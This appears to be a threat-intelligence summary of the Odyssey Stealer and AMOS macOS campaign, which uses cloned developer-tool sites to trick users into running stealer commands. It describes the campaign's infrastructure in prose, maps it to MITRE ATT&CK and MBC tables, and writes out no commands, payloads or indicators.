EXECUTIVE SUMMARY:
The Odyssey Stealer and AMOS (Atomic macOS Stealer) campaign represents a coordinated malware distribution effort aimed at macOS developers through deceptive social engineering. Instead of exploiting vulnerabilities, the attackers leverage trust in popular development tools by cloning legitimate websites such as Homebrew, TradingView, and LogMeIn. Unsuspecting users are lured into copying base64-encoded commands from these fake portals into their Terminal, triggering the download and execution of stealer malware. The campaign uses sophisticated infrastructure with over 85 identified phishing domains connected via shared SSL certificates and long-lived IPs, demonstrating strategic persistence.
The technical investigation revealed a structured and persistent infrastructure underpinning the campaign. The primary IP address, registered under a personal name in Finland, hosted multiple services including HTTP, SSH, and FTP—indicating multi-functional use for distribution and command-and-control operations. The presence of IMAPS and POP3S ports with shared SSL certificates linked it to another node, evidencing operational reuse across campaigns. These findings underscore a coordinated, multi-server environment adapted to support ongoing macOS malware activity. Attackers crafted fake Homebrew and LogMeIn sites that delivered payloads disguised as legitimate updates, enabling Odyssey Stealer and AMOS to exfiltrate credentials, system data, browser histories, and cryptocurrency information. The campaign’s infrastructure flexibility, combined with its ability to evade detection through minimal file signatures and realistic branding, demonstrates professional execution designed for scalability and stealth.
The Odyssey Stealer and AMOS campaign exemplifies a growing trend of macOS-focused, socially engineered malware operations. By exploiting user trust and leveraging cloned developer tools, the operators bypass traditional security mechanisms and deliver high-impact payloads without relying on software vulnerabilities. The reuse of long-standing infrastructure, consistent SSL certificates, and overlapping domain patterns indicate that the attackers maintain an efficient ecosystem for sustained malicious distribution. This persistence and operational recycling reflect both technical capability and strategic adaptability. The campaign serves as a critical reminder that even advanced macOS security frameworks can be undermined by human factors—particularly trust in open-source and widely recognized utilities. Enhanced domain verification, cautious command execution, and proactive threat intelligence monitoring remain essential for protecting developer environments against evolving, infrastructure-driven macOS threats.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.003 | Phishing | Spearphishing via Service |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Persistence | T1543.001 | Create or Modify System Process | Launch Agent |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocols | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Execution | E1204 | User Execution |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Collection | F0002 | Keylogging |
| E1113 | Screen Capture | |
| Communication Micro-objective | C0002 | HTTP Communication |
REFERENCES:
The following reports contain further technical details: